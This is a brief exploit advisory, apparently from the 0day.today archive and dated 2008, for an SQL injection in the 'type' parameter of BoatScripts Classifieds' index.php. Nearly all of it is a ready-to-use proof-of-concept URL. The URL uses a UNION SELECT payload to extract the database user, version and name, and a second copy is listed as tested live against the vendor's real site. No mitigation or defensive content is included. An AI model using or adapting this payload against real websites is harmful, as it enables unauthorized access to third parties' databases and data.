id: 3219
date: 06/17/2008
title: BoatScripts Classifieds (index.php type) SQL Injection Vulnerability
author: Stack
cves: 

====================================================================
BoatScripts Classifieds (index.php type) SQL Injection Vulnerability
====================================================================



BoatScripts Classifieds Sql INjection

By Stack

poc : http://site.co.il/index.php?type=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database())/*
live demo tested
http://www.boatscripts.com/boats/index.php?type=-1/**/UNION/**/SELECT/**/concat(char(58),user(),version(),database())/*



#  0day.today [2023-03-25]  #